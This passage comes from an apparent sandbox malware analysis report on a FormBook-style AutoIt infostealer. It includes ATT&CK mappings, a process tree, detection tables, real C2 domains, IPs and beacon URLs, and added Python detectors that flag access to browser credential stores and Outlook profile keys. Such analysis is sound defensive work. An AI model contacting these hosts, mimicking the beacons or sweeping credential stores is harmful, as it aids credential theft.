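    r'Source: C:\Windows\SysWOW64\makecab.exe | Key opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook' + '\\',
    # Constructed benign row: the browser reading its own store must not alert.
    r'Source: C:\Program Files\Google\Chrome\Application\chrome.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data',
]

FILE_RE = re.compile(r'^Source: (?P<src>.+?) \| File opened: (?P<path>.+)$')
KEY_RE = re.compile(r'^Source: (?P<src>.+?) \| Key opened: (?P<path>.+)$')

# Assumption: the one process expected to open each store while the user is
# logged on. Backup agents or password managers would need their own allow-list.
BROWSER_STORES = {
    'chrome': ('\\google\\chrome\\user data\\', 'chrome.exe'),
    'edge': ('\\microsoft\\edge\\user data\\', 'msedge.exe'),
}
ARTEFACTS = {'login data', 'cookies', 'web data', 'local state'}
OUTLOOK_PROFILES = 'windows messaging subsystem\\profiles'
MAIL_CLIENTS = {'outlook.exe'}


def basename(path):
    return path.rstrip('\\').rsplit('\\', 1)[-1].lower()


def classify(row):
    """(process, application, artefact) when a non-owner opened a store, else None."""
    m = FILE_RE.match(row)
    if m:
        src, path = basename(m['src']), m['path'].lower()
        artefact = basename(path)
        if artefact in ARTEFACTS:
            for app, (marker, owner) in BROWSER_STORES.items():
                if marker in path and src != owner:
                    return (src, app, artefact)
        return None
    m = KEY_RE.match(row)
    if m:
        src, path = basename(m['src']), m['path'].lower()
        if OUTLOOK_PROFILES in path and src not in MAIL_CLIENTS:
            return (src, 'outlook', 'mapi profile key')
    return None


def credential_access_report(rows):
    """All findings plus a per-process summary {process: {app: {artefacts}}}."""
    findings = [f for f in map(classify, rows) if f]
    summary = {}
    for src, app, artefact in findings:
        summary.setdefault(src, {}).setdefault(app, set()).add(artefact)
    return findings, summary


def stealer_like(summary, min_apps=2):
    """Processes that swept the stores of at least min_apps applications; one
    process touching several browsers plus mail is the infostealer pattern."""
    return sorted(src for src, apps in summary.items() if len(apps) >= min_apps)


if __name__ == '__main__':
    findings, summary = credential_access_report(ACCESS_ROWS)
    for src, apps in summary.items():
        for app, artefacts in apps.items():
            print(f'{src} read {app}: {", ".join(sorted(artefacts))}')
    print('stealer-like:', stealer_like(summary))
```

On the report's rows every makecab.exe access is flagged, the benign chrome.exe row is not, and makecab.exe is the only process that touched more than one application's stores. The same path and key markers are what a file-access or registry-access rule on endpoint telemetry (Sysmon event ID 11/12/13, or an EDR file-open event) would match on.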

Remote Access Functionality

The same FormBook Yara matches are cited here as evidence of remote-access capability. The two socket/bind/listen functions sit in the outer AutoIt-packed binary (process 0), not in the injected payload.

Source: Yara match | File source: 1.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 1.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 00000007.00000002.4102732817.0000000004C50000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000006.00000002.4100790450.0000000004470000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000001.00000002.1984172906.0000000000EE0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000006.00000002.4099201806.0000000002810000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000001.00000002.1983942569.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000005.00000002.4100789193.0000000005070000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000006.00000002.4100844845.00000000044B0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000001.00000002.1984670172.0000000006350000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan-Downloader.Autoit.gen.3453.31793.exe | Code function: 0_2_008F6596 socket,WSAGetLastError,bind,listen,WSAGetLastError,closesocket
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan-Downloader.Autoit.gen.3453.31793.exe | Code function: 0_2_008F6A5A socket,WSAGetLastError,bind,WSAGetLastError,closesocket
MITRE ATT&CK Matrix (rebuilt from the flattened grid, one line per tactic; a leading number is the report's signature-count badge for that technique, reproduced as extracted; unnumbered entries are the grid's standard placeholder techniques that no signature matched)

Reconnaissance: Gather Victim Identity Information; Credentials; Email Addresses; Employee Names; Gather Victim Network Information; Domain Properties; DNS; Network Trust Dependencies; Network Topology
Resource Development: Acquire Infrastructure; Domains; DNS Server; Virtual Private Server; Server; Botnet; Web Services; Serverless; Malvertising
Initial Access: 2 Valid Accounts; Default Accounts; Domain Accounts; Local Accounts; Cloud Accounts; Replication Through Removable Media; External Remote Services; Drive-by Compromise; Exploit Public-Facing Application
Execution: 2 Native API; Scheduled Task/Job; At; Cron; Launchd; Scheduled Task; Systemd Timers; Container Orchestration Job; Command and Scripting Interpreter
Persistence: 1 DLL Side-Loading; 2 Valid Accounts; Logon Script (Windows); Login Hook; Network Logon Script; RC Scripts; Startup Items; Scheduled Task/Job; At
Privilege Escalation: 1 Exploitation for Privilege Escalation; 1 Abuse Elevation Control Mechanism; 1 DLL Side-Loading; 2 Valid Accounts; 21 Access Token Manipulation; 412 Process Injection; Startup Items; Scheduled Task/Job; At
Defense Evasion: 1 Disable or Modify Tools; 1 Deobfuscate/Decode Files or Information; 1 Abuse Elevation Control Mechanism; 3 Obfuscated Files or Information; 1 DLL Side-Loading; 2 Valid Accounts; 2 Virtualization/Sandbox Evasion; 21 Access Token Manipulation; 412 Process Injection
Credential Access: 1 OS Credential Dumping; 21 Input Capture; Security Account Manager; NTDS; LSA Secrets; Cached Domain Credentials; DCSync; Proc Filesystem; /etc/passwd and /etc/shadow
Discovery: 2 System Time Discovery; 1 Account Discovery; 2 File and Directory Discovery; 116 System Information Discovery; 151 Security Software Discovery; 2 Virtualization/Sandbox Evasion; 3 Process Discovery; 11 Application Window Discovery; 1 System Owner/User Discovery
Lateral Movement: Remote Services; Remote Desktop Protocol; SMB/Windows Admin Shares; Distributed Component Object Model; SSH; VNC; Windows Remote Management; Cloud Services; Direct Cloud VM Connections
Collection: 1 Archive Collected Data; 1 Data from Local System; 1 Email Collection; 21 Input Capture; 3 Clipboard Data; GUI Input Capture; Web Portal Capture; Credential API Hooking; Data Staged
Command and Control: 4 Ingress Tool Transfer; 1 Encrypted Channel; 4 Non-Application Layer Protocol; 4 Application Layer Protocol; Fallback Channels; Multiband Communication; Commonly Used Port; Application Layer Protocol; Web Protocols
Exfiltration: Exfiltration Over Other Network Medium; Exfiltration Over Bluetooth; Automated Exfiltration; Traffic Duplication; Scheduled Transfer; Data Transfer Size Limits; Exfiltration Over C2 Channel; Exfiltration Over Alternative Protocol; Exfiltration Over Symmetric Encrypted Non-C2 Protocol
Impact: 1 System Shutdown/Reboot; Network Denial of Service; Data Encrypted for Impact; Data Destruction; Data Encrypted for Impact; Service Stop; Inhibit System Recovery; Defacement; Internal Defacement
Behavior Graph (ID 1474004, start date 16/07/2024, architecture WINDOWS, score 100), rebuilt from the flattened graph dump; bracketed numbers are the graph's per-node count badges as extracted.

Network nodes: www.rtpdewata4d-16.xyz; www.quixaclienti.com; 22 other IPs or domains. Signature on www.rtpdewata4d-16.xyz: Performs DNS queries to domains with low reputation.
Sample-level signatures: Malicious sample detected (through community Yara rule); Multi AV Scanner detection for submitted file; Yara detected FormBook; 3 other signatures.

Process tree:
SecuriteInfo.com.Trojan-Downloader.Autoit.gen.3453.31793.exe [4], started. Signatures: Binary is likely a compiled AutoIt script file; Writes to foreign memory regions; Maps a DLL or memory area into another process; Switches to a custom stack to bypass stack traces.
-> svchost.exe, started. Signatures: Maps a DLL or memory area into another process.
--> rULxYvbAFLatPN.exe, injected. Signatures: Found direct / indirect Syscall (likely to bypass EDR).
---> makecab.exe [13], started. Signatures: Tries to steal Mail credentials (via file / registry access); Tries to harvest and steal browser information (history, passwords, etc); Modifies the context of a thread in another process (thread injection); 3 other signatures.
----> rULxYvbAFLatPN.exe, injected. Signatures: Found direct / indirect Syscall (likely to bypass EDR). Network: www.rtpdewata4d-16.xyz 104.21.89.46 (local ports 49770, 49771, 49772), CLOUDFLARENETUS, United States; www.quiluxx.top 203.161.41.205 (local ports 49758, 49759, 49760), VNPT-AS-VNVNPTCorpVN, Malaysia; 9 other IPs or domains.
----> firefox.exe, started.

Antivirus Detection

Initial Sample
Source | Detection | Scanner | Label
SecuriteInfo.com.Trojan-Downloader.Autoit.gen.3453.31793.exe | 37% | ReversingLabs | Win32.Trojan.AutoitInject
SecuriteInfo.com.Trojan-Downloader.Autoit.gen.3453.31793.exe | 30% | Virustotal |
SecuriteInfo.com.Trojan-Downloader.Autoit.gen.3453.31793.exe | 100% | Joe Sandbox ML |

Dropped Files
No Antivirus matches

Unpacked PE Files
No Antivirus matches
Domains
Source | Detection | Scanner
kundalisathi.com | 0% | Virustotal
mysticriverpath.com | 0% | Virustotal
kera333.org | 0% | Virustotal
www.focusonsocials.com | 0% | Virustotal
bearclaw.bot | 0% | Virustotal
quixaclienti.com | 0% | Virustotal
www.itsjojosiwas.com | 0% | Virustotal
www.quiluxx.top | 1% | Virustotal
www.onlandtoy.com | 0% | Virustotal
www.bb58cc.com | 0% | Virustotal
www.mysticriverpath.com | 0% | Virustotal
www.quixaclienti.com | 0% | Virustotal
www.lmsforsme.com | 0% | Virustotal
www.kera333.org | 1% | Virustotal
www.kundalisathi.com | 0% | Virustotal
www.bearclaw.bot | 0% | Virustotal
www.quests-galxe.com | 0% | Virustotal
URLs
Source | Detection | Scanner | Label
https://connect.facebook.net/en_US/fbevents.js | 0% | URL Reputation | safe
https://schema.org | 0% | URL Reputation | safe
https://www.ecosia.org/newtab/ | 0% | URL Reputation | safe
http://gmpg.org/xfn/11 | 0% | URL Reputation | safe
https://yoast.com/wordpress/plugins/seo/ | 0% | URL Reputation | safe
https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command= | 0% | URL Reputation | safe
https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search | 0% | URL Reputation | safe
https://duckduckgo.com/chrome_newtab | 0% | Avira URL Cloud | safe
https://duckduckgo.com/ac/?q= | 0% | Avira URL Cloud | safe
https://www.itsjojosiwas.com/wp-includes/js/dist/data.min.js?ver=dc5f255634f3da29c8d5 | 0% | Avira URL Cloud | safe
http://www.onlandtoy.com/feed/ | 0% | Avira URL Cloud | safe
http://www.onlandtoy.com/sample-page/ | 0% | Avira URL Cloud | safe
http://www.mysticriverpath.com/6vu8/?UbV=9BQQ4LaVGcGIAegoNYy4BANrrk0FTQnfEPkS9PLUef2OP02gFBPJINGmLbjvn2PiRjYvhByaYI3HRuE2zbw60OnBrR/0yXqwb0H4BL8PQO8YxsUyAjYVuYA=&Y4gp=mlltcrRxcL | 0% | Avira URL Cloud | safe
https://www.itsjojosiwas.com/refund_returns/ | 0% | Avira URL Cloud | safe
https://duckduckgo.com/chrome_newtab | 0% | Virustotal |
https://duckduckgo.com/ac/?q= | 0% | Virustotal |
http://www.rtpdewata4d-16.xyz/1mac/?UbV=vFCnEL2gmua2cn7cu+7uA1zrn4XuDHvsitE9TDncytOkj3MvcAAJscub939fSKqOURYthMBxIAmeZUaSv4+xK96qNWaFi0LmQ135fUkfGeU9K1xxgFotmEw=&Y4gp=mlltcrRxcL | 0% | Avira URL Cloud | safe
http://www.bearclaw.bot/f6em/?UbV=3scc/l+m0dTfturexYmDD/ihdyc/GZ5DxLslLbTADZTZz0L4ImmnnfNh8/fEKVgbyf/SBi86BZffcRTKk/E5LLaY5QN8jxf/mVG9V1ZF+n+osgl4kzW2NMc=&Y4gp=mlltcrRxcL | 0% | Avira URL Cloud | safe
https://www.itsjojosiwas.com/?s= | 0% | Avira URL Cloud | safe
https://www.itsjojosiwas.com/product-category/armen-living/ | 0% | Avira URL Cloud | safe
https://www.itsjojosiwas.com/wp-content/plugins/woocommerce/assets/client/blocks/wc-settings.js?ver= | 0% | Avira URL Cloud | safe
https://www.focusonsocials.com/rbwl/?UbV=yHm6enFIYs/ovpirZiNA1kNGPi3kBJu5kTNDWZFxfmq4 | 0% | Avira URL Cloud | safe
https://www.itsjojosiwas.com/wp-includes/js/dist/vendor/react-dom.min.js?ver=18.2.0 | 0% | Avira URL Cloud | safe
https://www.itsjojosiwas.com/wp-content/themes/flatsome/assets/css/ie-fallback.css | 0% | Avira URL Cloud | safe
https://www.itsjojosiwas.com/wp-json/ | 0% | Avira URL Cloud | safe
http://www.onlandtoy.com/wp-content/themes/twentytwentyfour/assets/fonts/cardo/cardo_italic_400.woff | 0% | Avira URL Cloud | safe
http://www.onlandtoy.com/xmlrpc.php?rsd | 0% | Avira URL Cloud | safe
https://www.itsjojosiwas.com/wp-content/plugins/woocommerce/assets/js/frontend/order-attribution-blo | 0% | Avira URL Cloud | safe
http://www.onlandtoy.com/ | 0% | Avira URL Cloud | safe
https://www.itsjojosiwas.com/product-category/pferd/ | 0% | Avira URL Cloud | safe
https://www.itsjojosiwas.com/wp-includes/js/dist/redux-routine.min.js?ver=0be1b2a6a79703e28531 | 0% | Avira URL Cloud | safe
https://www.itsjojosiwas.com/wp-includes/js/dist/url.min.js?ver=b4979979018b684be209 | 0% | Avira URL Cloud | safe
https://www.itsjojosiwas.com/wp-includes/js/dist/keycodes.min.js?ver=3460bd0fac9859d6886c | 0% | Avira URL Cloud | safe
http://www.itsjojosiwas.com/0koa/?UbV=mkhz803NSe67VDi/XqoOvDTg0lhLFFwDmFAH6HAD7lWiJHUqLX0wanSTKUh9Wz+qOKuxLFQRu1GlWT2p2cyKlA2Zual+9OKI76CIESdTTdJvOpGtX0Yw5/M=&Y4gp=mlltcrRxcL | 0% | Avira URL Cloud | safe
https://www.itsjojosiwas.com/xmlrpc.php?rsd | 0% | Avira URL Cloud | safe
https://www.itsjojosiwas.com/wp-content/them | 0% | Avira URL Cloud | safe
http://www.onlandtoy.com | 0% | Avira URL Cloud | safe
https://www.itsjojosiwas.com/wp-content/plugins/woocommerce/assets/client/blocks/wc-blocks-middlewar | 0% | Avira URL Cloud | safe
https://www.itsjojosiwas.com/my-account/ | 0% | Avira URL Cloud | safe
http://www.bb58cc.com/sq05/ | 0% | Avira URL Cloud | safe
https://www.itsjojosiwas.com/wp-includes/js/dist/priority-queue.min.js?ver=422e19e9d48b269c5219 | 0% | Avira URL Cloud | safe
http://www.quiluxx.top/snq6/ | 0% | Avira URL Cloud | safe
https://www.itsjojosiwas.com/wp-includes/js/dist/data-controls.min.js?ver=fe4ccc8a1782ea8e2cb1 | 0% | Avira URL Cloud | safe
https://www.itsjojosiwas.com/wp-includes/js/dist/hooks.min.js?ver=c6aec9a8d4e5a5d543a1 | 0% | Avira URL Cloud | safe
https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q= | 0% | Avira URL Cloud | safe
https://www.itsjojosiwas.com/wp-content/themes/flatsome/inc/extensions/flatsome-live-search/flatsome | 0% | Avira URL Cloud | safe
https://www.itsjojosiwas.com/wp-content/plugins/woocommerce/assets/client/blocks/wc-blocks.css?ver=1 | 0% | Avira URL Cloud | safe
https://www.itsjojosiwas.com/wp-includes/js/dist/escape-html.min.js?ver=03e27a7b6ae14f7afaa6 | 0% | Avira URL Cloud | safe
http://www.mysticriverpath.com/6vu8/ | 0% | Avira URL Cloud | safe
http://www.3333711m14.shop/fl6s/ | 0% | Avira URL Cloud | safe
https://www.itsjojosiwas.com/wp-includes/js/dist/dom-ready.min.js?ver=392bdd43726760d1f3ca | 0% | Avira URL Cloud | safe
https://www.itsjojosiwas.com/wp-content/plugins/woocommerce/assets/js/frontend/order-attribution.min | 0% | Avira URL Cloud | safe
https://www.itsjojosiwas.com/wp-includes/js/hoverIntent.min.js?ver=1.10.2 | 0% | Avira URL Cloud | safe
https://www.itsjojosiwas.com/wp-content/plugins/woocommerce/assets/js/frontend/woocommerce.min.js?ve | 0% | Avira URL Cloud | safe
http://www.onlandtoy.com/wp-content/themes/twentytwentyfour/assets/fonts/inter/Inter-VariableFont_sl | 0% | Avira URL Cloud | safe
https://www.itsjojosiwas.com/wp-admin/admin-ajax.php?action=rest-nonce | 0% | Avira URL Cloud | safe
https://www.itsjojosiwas.com/wp-content/plugins/woocommerce/assets/client/blocks/wc-blocks-registry. | 0% | Avira URL Cloud | safe
https://www.itsjojosiwas.com/wp-includes/js/dist/vendor/wp-polyfill-inert.min.js?ver=3.1.2 | 0% | Avira URL Cloud | safe
https://www.itsjojosiwas.com/wp-content/themes/flatsome/assets/css/fl-icons.css?ver=3.12 | 0% | Avira URL Cloud | safe
http://www.iitaccounting.com/nbaz/ | 0% | Avira URL Cloud | safe
https://www.itsjojosiwas.com/wp-content/themes/flatsome/assets/css/flatsome.css?ver=6.4.3 | 0% | Avira URL Cloud | safe
https://www.itsjojosiwas.com/wp-includes/js/dist/vendor/react.min.js?ver=18.2.0 | 0% | Avira URL Cloud | safe
https://www.itsjojosiwas.com/shipping-info/ | 0% | Avira URL Cloud | safe
https://www.itsjojosiwas.com/ | 0% | Avira URL Cloud | safe
http://www.quixaclienti.com/7ein/ | 0% | Avira URL Cloud | safe
https://www.itsjojosiwas.com/wp-includes/js/dist/is-shallow-equal.min.js?ver=20c2b06ecf04afb14fee | 0% | Avira URL Cloud | safe
http://www.onlandtoy.com/wp-content/themes/twentytwentyfour/assets/fonts/cardo/cardo_normal_700.woff | 0% | Avira URL Cloud | safe
https://www.itsjojosiwas.com/wp-content/plugins/woocommerce/assets/client/blocks/blocks-components.j | 0% | Avira URL Cloud | safe
https://www.itsjojosiwas.com/wp-content/plugins/woocommerce/assets/client/blocks/blocks-checkout.js? | 0% | Avira URL Cloud | safe
http://www.onlandtoy.com/wp-includes/js/dist/vendor/wp-polyfill-importmap.min.js?ver=1.8.2 | 0% | Avira URL Cloud | safe
https://www.itsjojosiwas.com/xmlrpc.php | 0% | Avira URL Cloud | safe
https://www.itsjojosiwas.com/conditions-of-use/ | 0% | Avira URL Cloud | safe
https://www.itsjojosiwas.com/feed/ | 0% | Avira URL Cloud | safe
https://www.itsjojosiwas.com/wp-content/themes/flatsome/assets/libs/ie-flexibility.js | 0% | Avira URL Cloud | safe
http://www.onlandtoy.com/pgto/?UbV=E7gJQqjSEHiqU9c9ksgsPN71gncF+WmU2fL1k5JHUJhFxTz44zYRR/afhYUOahGq3ZObWGCJogocVOMqr7fasKcgDvUaUtJUxsyY6DreonZJ8NGE1S91eUs=&Y4gp=mlltcrRxcL | 0% | Avira URL Cloud | safe
http://www.focusonsocials.com/rbwl/ | 0% | Avira URL Cloud | safe
http://www.bestandpure.com/xifn/?UbV=KeMApzCPoibat+BJrS4W/yBC5Ro5YTaRI5q2x3+rXL+pd1pzECcJYSRXND6sMrc7vw3XUkLR+QUTQhFw9n6rFEpLq+HIvi3a35dAhTq9JdFe3G51xVcQNW0=&Y4gp=mlltcrRxcL | 0% | Avira URL Cloud | safe
http://www.bestandpure.com/xifn/ | 0% | Avira URL Cloud | safe
https://www.itsjojosiwas.com/wp-content/uploads/2024/06/cropped-pngtree-ship-logo-cruise-or-ship-log | 0% | Avira URL Cloud | safe
http://www.lmsforsme.com/0x0m/?UbV=YWHt7d8s1wtxEc6N7JBdk3GvQZUe6qigJh5gb0SeLYvcAy/h2X15EObbup3pZ5JIlELN4AUs60aWctEAjqiruE1aq+9hFwKJnnwArXASsnPjRvxDOp7wEtw=&Y4gp=mlltcrRxcL | 0% | Avira URL Cloud | safe
https://www.itsjojosiwas.com/product-category/permatex/ | 0% | Avira URL Cloud | safe
https://www.itsjojosiwas.com/wp-content/themes/flatsome/assets/css/flatsome-shop.css?ver=6.4.3 | 0% | Avira URL Cloud | safe
http://www.kundalisathi.com/esfu/?UbV=gh5yKdvhconYF1IQdW8vdxSZdz4d9+SHwgQXx3mIDLUkg8HVZvA84ZxaBoLmPIr804qY2VBHslVt+Qh3tR7ZY1ctik1AAurafdW52ChWUJGqDg8qNhYLIWg=&Y4gp=mlltcrRxcL | 0% | Avira URL Cloud | safe
https://www.itsjojosiwas.com/wp-content/plugins/woocommerce/assets/client/blocks/wc-blocks-data.js?v | 0% | Avira URL Cloud | safe
https://wordpress.org/plugins/woocommerce-conversion-tracking/) | 0% | Avira URL Cloud | safe
https://www.itsjojosiwas.com/wp-includes/js/dist/element.min.js?ver=ed1c7604880e8b574b40 | 0% | Avira URL Cloud | safe
http://www.focusonsocials.com/rbwl/?UbV=yHm6enFIYs/ovpirZiNA1kNGPi3kBJu5kTNDWZFxfmq4+4eFgr/++B8wLRVxCj6ZcFesL3DTSsX/73fVlamlaT/sJduaX9mgiTgnUifyDkvpJfWGHGD/zyQ=&Y4gp=mlltcrRxcL | 0% | Avira URL Cloud | safe
https://www.itsjojosiwas.com/product-category/esf/ | 0% | Avira URL Cloud | safe
http://www.kera333.org/9grl/ | 0% | Avira URL Cloud | safe
https://www.itsjojosiwas.com/wp-content/plugins/woocommerce/assets/js/sourcebuster/sourcebuster.min. | 0% | Avira URL Cloud | safe
http://www.kera333.org/9grl/?UbV=/9MdGCeeA5FyGWImDjb6SSoEi2eI86nByvS7j/dpG/wpEvIodpeda31qunpqinbT/PdN7YoBB4YXLVBs6DMrn+UTK6ScrsDz3wZvnBGs6Z4ywzADABVVsu0=&Y4gp=mlltcrRxcL | 0% | Avira URL Cloud | safe
https://www.itsjojosiwas.com/wp-content/themes/flatsome/style.css?ver=6.4.3 | 0% | Avira URL Cloud | safe
http://www.itsjojosiwas.com/0koa/ | 0% | Avira URL Cloud | safe
https://www.itsjojosiwas.com/wp-content/themes/flatsome/assets/js/woocommerce.js?ver=6.4.3 | 0% | Avira URL Cloud | safe
https://www.itsjojosiwas.com/wp-content/plugins/woocommerce/assets/js/js-cookie/js.cookie.min.js?ver | 0% | Avira URL Cloud | safe
https://www.itsjojosiwas.com/wp-includes/css/dist/block-library/style.min.css?ver=6.4.3 | 0% | Avira URL Cloud | safe
http://www.onlandtoy.com/wp-includes/js/dist/interactivity.min.js?ver=6.5.2 | 0% | Avira URL Cloud | safe
https://www.itsjojosiwas.com/wp-includes/js/dist/deprecated.min.js?ver=73ad3591e7bc95f4777a | 0% | Avira URL Cloud | safe
https://www.itsjojosiwas.com/wp-includes/js/dist/vendor/lodash.min.js?ver=4.17.19 | 0% | Avira URL Cloud | safe
https://www.itsjojosiwas.com/wp-includes/js/dist/i18n.min.js?ver=7701b0c3857f914212ef | 0% | Avira URL Cloud | safe

Note that the "safe" verdicts above are URL-reputation lookups, not verdicts on the traffic: the URLs with a four-character path and the UbV/Y4gp query pair are the FormBook beacons the injected thread sent, and the WordPress asset and page URLs under www.itsjojosiwas.com and www.onlandtoy.com are the HTML those sites returned to the beacon and were later found in process memory.
Contacted Domains
Name | IP | Active | Malicious | Antivirus Detection | Reputation
kundalisathi.com | 3.33.130.190 | true | false | | unknown
www.bestandpure.com | 3.33.244.179 | true | false | | unknown
mysticriverpath.com | 216.194.173.237 | true | false | | unknown
kera333.org | 64.46.102.70 | true | false | | unknown
lmsforsme.com | 3.33.130.190 | true | false | | unknown
www.focusonsocials.com | 212.227.172.254 | true | false | | unknown
bearclaw.bot | 3.33.130.190 | true | false | | unknown
quixaclienti.com | 3.33.130.190 | true | false | | unknown
www.itsjojosiwas.com | 172.67.196.1 | true | false | | unknown
www.quiluxx.top | 203.161.41.205 | true | false | | unknown
www.onlandtoy.com | 43.157.128.107 | true | false | | unknown
www.bb58cc.com | 103.176.91.154 | true | false | | unknown
www.rtpdewata4d-16.xyz | 104.21.89.46 | true | true | | unknown
nbq.ssywan.com | 23.105.215.248 | true | false | | unknown
iitaccounting.com | 3.33.130.190 | true | false | | unknown
www.mysticriverpath.com | unknown | unknown | true | | unknown
www.iitaccounting.com | unknown | unknown | true | | unknown
www.quixaclienti.com | unknown | unknown | true | | unknown
www.kundalisathi.com | unknown | unknown | true | | unknown
www.kera333.org | unknown | unknown | true | | unknown
www.quests-galxe.com | unknown | unknown | true | | unknown
www.bearclaw.bot | unknown | unknown | true | | unknown
www.lmsforsme.com | unknown | unknown | true | | unknown
www.3333711m14.shop | unknown | unknown | true | | unknown

Five of the resolved apex names (kundalisathi.com, lmsforsme.com, bearclaw.bot, quixaclienti.com, iitaccounting.com) share the single address 3.33.130.190, and several www names did not resolve at all. FormBook configurations carry a list of candidate C2 hosts of which typically only one is live and the rest are decoys, so this table should be read as the campaign's full host list rather than as sixteen live C2 servers. Only two of the hosts were actually reached over TCP in the behaviour graph: www.rtpdewata4d-16.xyz on 104.21.89.46 and www.quiluxx.top on 203.161.41.205.
                          NameMaliciousAntivirus DetectionReputation
                          http://www.mysticriverpath.com/6vu8/?UbV=9BQQ4LaVGcGIAegoNYy4BANrrk0FTQnfEPkS9PLUef2OP02gFBPJINGmLbjvn2PiRjYvhByaYI3HRuE2zbw60OnBrR/0yXqwb0H4BL8PQO8YxsUyAjYVuYA=&Y4gp=mlltcrRxcLfalse
                          • Avira URL Cloud: safe
                          unknown
                          http://www.rtpdewata4d-16.xyz/1mac/?UbV=vFCnEL2gmua2cn7cu+7uA1zrn4XuDHvsitE9TDncytOkj3MvcAAJscub939fSKqOURYthMBxIAmeZUaSv4+xK96qNWaFi0LmQ135fUkfGeU9K1xxgFotmEw=&Y4gp=mlltcrRxcLfalse
                          • Avira URL Cloud: safe
                          unknown
                          http://www.bearclaw.bot/f6em/?UbV=3scc/l+m0dTfturexYmDD/ihdyc/GZ5DxLslLbTADZTZz0L4ImmnnfNh8/fEKVgbyf/SBi86BZffcRTKk/E5LLaY5QN8jxf/mVG9V1ZF+n+osgl4kzW2NMc=&Y4gp=mlltcrRxcLfalse
                          • Avira URL Cloud: safe
                          unknown
                          http://www.itsjojosiwas.com/0koa/?UbV=mkhz803NSe67VDi/XqoOvDTg0lhLFFwDmFAH6HAD7lWiJHUqLX0wanSTKUh9Wz+qOKuxLFQRu1GlWT2p2cyKlA2Zual+9OKI76CIESdTTdJvOpGtX0Yw5/M=&Y4gp=mlltcrRxcLfalse
                          • Avira URL Cloud: safe
                          unknown
                          http://www.bb58cc.com/sq05/false
                          • Avira URL Cloud: safe
                          unknown
                          http://www.quiluxx.top/snq6/false
                          • Avira URL Cloud: safe
                          unknown
                          http://www.mysticriverpath.com/6vu8/false
                          • Avira URL Cloud: safe
                          unknown
                          http://www.3333711m14.shop/fl6s/false
                          • Avira URL Cloud: safe
                          unknown
                          http://www.iitaccounting.com/nbaz/false
                          • Avira URL Cloud: safe
                          unknown
                          http://www.quixaclienti.com/7ein/false
                          • Avira URL Cloud: safe
                          unknown
                          http://www.onlandtoy.com/pgto/?UbV=E7gJQqjSEHiqU9c9ksgsPN71gncF+WmU2fL1k5JHUJhFxTz44zYRR/afhYUOahGq3ZObWGCJogocVOMqr7fasKcgDvUaUtJUxsyY6DreonZJ8NGE1S91eUs=&Y4gp=mlltcrRxcLfalse
                          • Avira URL Cloud: safe
                          unknown
                          http://www.focusonsocials.com/rbwl/false
                          • Avira URL Cloud: safe
                          unknown
                          http://www.bestandpure.com/xifn/?UbV=KeMApzCPoibat+BJrS4W/yBC5Ro5YTaRI5q2x3+rXL+pd1pzECcJYSRXND6sMrc7vw3XUkLR+QUTQhFw9n6rFEpLq+HIvi3a35dAhTq9JdFe3G51xVcQNW0=&Y4gp=mlltcrRxcLfalse
                          • Avira URL Cloud: safe
                          unknown
                          http://www.bestandpure.com/xifn/false
                          • Avira URL Cloud: safe
                          unknown
                          http://www.lmsforsme.com/0x0m/?UbV=YWHt7d8s1wtxEc6N7JBdk3GvQZUe6qigJh5gb0SeLYvcAy/h2X15EObbup3pZ5JIlELN4AUs60aWctEAjqiruE1aq+9hFwKJnnwArXASsnPjRvxDOp7wEtw=&Y4gp=mlltcrRxcLfalse
                          • Avira URL Cloud: safe
                          unknown
                          http://www.kundalisathi.com/esfu/?UbV=gh5yKdvhconYF1IQdW8vdxSZdz4d9+SHwgQXx3mIDLUkg8HVZvA84ZxaBoLmPIr804qY2VBHslVt+Qh3tR7ZY1ctik1AAurafdW52ChWUJGqDg8qNhYLIWg=&Y4gp=mlltcrRxcLfalse
                          • Avira URL Cloud: safe
                          unknown
                          http://www.focusonsocials.com/rbwl/?UbV=yHm6enFIYs/ovpirZiNA1kNGPi3kBJu5kTNDWZFxfmq4+4eFgr/++B8wLRVxCj6ZcFesL3DTSsX/73fVlamlaT/sJduaX9mgiTgnUifyDkvpJfWGHGD/zyQ=&Y4gp=mlltcrRxcLfalse
                          • Avira URL Cloud: safe
                          unknown
                          http://www.kera333.org/9grl/false
                          • Avira URL Cloud: safe
                          unknown
                          http://www.kera333.org/9grl/?UbV=/9MdGCeeA5FyGWImDjb6SSoEi2eI86nByvS7j/dpG/wpEvIodpeda31qunpqinbT/PdN7YoBB4YXLVBs6DMrn+UTK6ScrsDz3wZvnBGs6Z4ywzADABVVsu0=&Y4gp=mlltcrRxcLfalse
                          • Avira URL Cloud: safe
                          unknown
                          http://www.itsjojosiwas.com/0koa/false
                          • Avira URL Cloud: safe
                          unknown
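The contacted URLs share one shape: a single four-character path segment and two query parameters named UbV and Y4gp, the first carrying a long base64-alphabet blob and the second the same token, mlltcrRxcL, in every beacon on this page. As an added example (editor's code, not part of the Joe Sandbox report), the Python below classifies URLs by that shape and groups the hits by host. It splits the query by hand because parse_qsl would turn the "+" characters inside the blob into spaces. The length bounds are assumptions chosen to fit the values on this page; the beacon inputs are copied from the table above and the non-beacon controls from the report's other URL tables.

```python
"""Shape-based classifier for the FormBook-style beacon URLs in this report.

Added example, not Joe Sandbox code. The shape is read off the URLs above:
one four-character path segment, then exactly two query parameters with short
names; the first value is a long base64-alphabet blob and the second a short
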